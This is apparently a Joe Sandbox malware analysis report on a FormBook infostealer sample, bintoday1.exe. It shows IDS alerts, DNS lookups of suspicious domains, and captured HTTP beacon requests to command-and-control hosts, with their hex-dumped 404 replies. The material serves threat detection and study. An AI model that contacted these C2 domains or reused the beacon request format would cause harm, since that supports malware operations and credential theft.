Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49724 -> 91.184.0.200:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49723 -> 91.184.0.200:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49745 -> 62.149.128.40:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49730 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49741 -> 35.244.245.121:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49737 -> 199.59.243.226:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49719 -> 198.57.245.28:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49740 -> 35.244.245.121:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49753 -> 65.21.196.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49734 -> 199.59.243.226:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49751 -> 65.21.196.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49742 -> 62.149.128.40:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49750 -> 18.162.124.14:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49748 -> 18.162.124.14:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49738 -> 35.244.245.121:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49752 -> 65.21.196.90:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.030002721.xyz

Source: Joe Sandbox View	IP Address: 62.149.128.40 62.149.128.40
Source: Joe Sandbox View	IP Address: 91.184.0.200 91.184.0.200
Source: Joe Sandbox View	IP Address: 91.184.0.200 91.184.0.200

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: ARUBA-ASNIT ARUBA-ASNIT
Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00C0CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_00C0CE44

Source: global traffic	HTTP traffic detected: GET /n2gl/?oLy=-hKdflfxw6&cLStcv3=flitv4ONTDzavgdus+zcTsH6nWgS1QLhloTdmohmQPl3KhGoeMiAoTCl41HMocxZ34RiCsybNbAZ6Ep4mPYRLqm0WDj9ayw3PA1jxKqGfzp18YAn+IY5szwPiI05gk5QbUl5B1g= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.limonchimneysweep.shopUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /mm14/?cLStcv3=CxHrv/DWf/f861hRjo0poFYX/xbpoqE9Pkz05rQHhXI0npb5DSaX7ma8TZVC8w6DWPy//ybPymtpw/3NO+S+AgB4ZcSH0lp13pJAkJlF+hiKkERgruIPxb4FabZ2eu3OSDY3yr0=&oLy=-hKdflfxw6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.jobworklanka.onlineUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /9b27/?oLy=-hKdflfxw6&cLStcv3=7ENy1dnK+hlvjvEO/OaYGC3Wgmb4rYaSD+U+jb6JyxCjiQU3Pm3SylzrvkP1vqSBFdPksRSgAkGS8fPPQLcJJVTWiO9mdIE7BDDVXVUUUxr3BCXvrTsebkLO52NTcukFU1xGaVw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.helloanecdotenow.infoUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /6t1p/?cLStcv3=5u/7pIClCxGMr2JDx2moDp4N5NUQR5UHhhh3f8bPAU6e1g5SUh+0OFL6u88M+0RJj1mDTEfrnKPtCcHZ9I9M5tKPqU536cb7UTbsX5MdChh4yVfj4lbg76/wDExADHyv3XJ8cq4=&oLy=-hKdflfxw6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.dom-2.onlineUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /m39s/?oLy=-hKdflfxw6&cLStcv3=UQp9655FjW3LvDLkuw2PvKQDrSZERfsuMNaS+TvkLzXyh0NXcttmOremH7COUKcvmncAqxPe6ceu/n78V0Nrg4HMIj+GFDcR1qbYt4rdB9Ep+oQFjrOMsJirX3vFU26KFVbUkuI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.kiristyle.shopUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /m3ft/?cLStcv3=mm8fgD9+jitkhgs161OZt8fCms83PFFT8XhsXaqjQsukr7/M7pRfQgp4Nt/ggm/XryzwVs+W+lrB4JMnarTnzCQZM7KWEo1HwHoI3FMw782O73yIdszacYliHArJfGfO1B1Ji3g=&oLy=-hKdflfxw6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.fimgroup.netUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E)
Source: global traffic	HTTP traffic detected: GET /gzjk/?cLStcv3=YDlNDhHByhlf6nQelagaT3FTRjXu5jrNjAd5ZmuDrGe9JGDYJAs2Uym5b/cCl1RiDZ+iQgyIXf65KlrikbfSKljvf01yS/1iDTwvEAEyzsoYMlH0K0Blq6hvBg/o1tysCZp8w58=&oLy=-hKdflfxw6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.6rkdm.topUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E)

Source: global traffic	DNS traffic detected: DNS query: www.limonchimneysweep.shop
Source: global traffic	DNS traffic detected: DNS query: www.jobworklanka.online
Source: global traffic	DNS traffic detected: DNS query: www.helloanecdotenow.info
Source: global traffic	DNS traffic detected: DNS query: www.dom-2.online
Source: global traffic	DNS traffic detected: DNS query: www.kiristyle.shop
Source: global traffic	DNS traffic detected: DNS query: www.fimgroup.net
Source: global traffic	DNS traffic detected: DNS query: www.loveinpoeipet07.site
Source: global traffic	DNS traffic detected: DNS query: www.6rkdm.top
Source: global traffic	DNS traffic detected: DNS query: www.030002721.xyz

Source: unknown

HTTP traffic detected: POST /mm14/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Connection: closeContent-Length: 212Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Host: www.jobworklanka.onlineOrigin: http://www.jobworklanka.onlineReferer: http://www.jobworklanka.online/mm14/User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E)Data Raw: 63 4c 53 74 63 76 33 3d 50 7a 76 4c 73 4a 7a 49 50 6f 4c 36 36 47 56 71 38 34 74 49 69 6d 49 30 38 68 4b 4f 68 4c 31 77 57 6a 2b 58 36 63 67 47 73 56 34 68 6f 37 36 43 43 78 54 4d 32 6d 66 34 47 65 56 37 78 7a 37 4c 42 2f 4f 76 36 68 69 75 71 6e 70 2b 30 4c 2b 72 50 74 50 41 4c 53 68 46 59 4f 32 33 32 33 63 41 31 37 5a 54 38 4c 49 41 32 68 76 4a 31 46 35 72 6e 49 63 58 69 65 38 77 4b 2f 6f 67 4f 63 33 4c 61 69 4d 6e 33 62 44 47 50 59 63 77 48 6f 54 64 46 39 44 2b 72 62 49 42 68 7a 59 50 47 38 58 4e 70 45 35 56 66 54 61 30 43 34 55 70 77 4d 53 50 78 72 44 66 6a 4c 46 44 77 4e 68 7a 46 65 66 79 67 56 51 35 78 47 4b 73 41 6b 44 50 Data Ascii: cLStcv3=PzvLsJzIPoL66GVq84tIimI08hKOhL1wWj+X6cgGsV4ho76CCxTM2mf4GeV7xz7LB/Ov6hiuqnp+0L+rPtPALShFYO2323cA17ZT8LIA2hvJ1F5rnIcXie8wK/ogOc3LaiMn3bDGPYcwHoTdF9D+rbIBhzYPG8XNpE5VfTa0C4UpwMSPxrDfjLFDwNhzFefygVQ5xGKsAkDP

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:23:25 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 24 Oct 2019 09:25:04 GMTAccept-Ranges: bytesContent-Length: 746Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 36 65 6d 3b 20 7d 20 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 47 65 6f 72 67 69 61 2c 20 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 34 61 34 61 34 61 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 65 6d 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 22 3e 0a 20 20 20 20 53 6f 72 72 79 2c 20 74 68 69 73 20 70 61 67 65 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 65 20 55 52 4c 20 6f 72 20 67 6f 20 62 61 63 6b 20 61 20 70 61 67 65 2e 0a 20 20 3c 2f 68 31 3e 0a 20 20 0a 20 20 3c 68 32 20 73 74 79 6c 65 3d 22 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 37 64 37 64 37 64 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 22 3e 0a 20 20 20 20 34 30 34 20 45 72 72 6f 72 2e 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 0a 20 20 3c 2f 68 32 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <style> @media screen and (max-width:500px) { body { font-size: .6em; } } </style></head><body style="text-align: center;"> <h1 style="font-family: Georgia, serif; color: #4a4a4a; marg
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:23:41 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:23:44 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:23:46 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:23:49 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Thu, 29 Aug 2024 10:25:06 GMTConnection: closeContent-Length: 4948Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Thu, 29 Aug 2024 10:25:09 GMTConnection: closeContent-Length: 4948Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 